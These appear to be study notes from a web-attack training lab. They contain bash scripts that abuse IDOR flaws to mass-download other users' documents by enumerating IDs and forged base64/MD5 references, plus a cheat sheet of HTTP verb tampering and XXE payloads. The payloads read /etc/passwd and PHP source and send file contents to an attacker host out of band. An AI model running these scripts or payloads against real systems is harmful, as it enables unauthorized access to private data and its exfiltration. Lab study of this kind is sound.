IDOR

// retrieve docs
#!/bin/bash

url="http://SERVER_IP:PORT"

for i in {1..10}; do
        for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
                wget -q $url/$link
        done
done

 echo -n 1 | base64 -w 0 | md5sum
cdd96d3cc73d1dbdaffa03cc6cd7339b 

 for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done
 
 // download contracts
 #!/bin/bash

for i in {1..10}; do
    for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
        curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
    done
done

Cheat Sheet

The cheat sheet is a useful command reference for the Web attack module.

HTTP Verb Tampering

HTTP Method

• HEAD

• PUT

• DELETE

• OPTIONS

• PATCH

Command	Description
-X OPTIONS	Set HTTP Method with Curl

IDOR

Identify IDORS

• In URL parameters & APIs

• In AJAX Calls

• By understanding reference hashing/encoding

• By comparing user roles

Command	Description
md5sum	MD5 hash a string
base64	Base64 encode a string

XXE

Code	Description
<!ENTITY xxe SYSTEM "http://localhost/email.dtd">	Define External Entity to a URL
<!ENTITY xxe SYSTEM "file:///etc/passwd">	Define External Entity to a file path
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">	Read PHP source code with base64 encode filter
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">	Reading a file through a PHP error
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">	Reading a file OOB exfiltration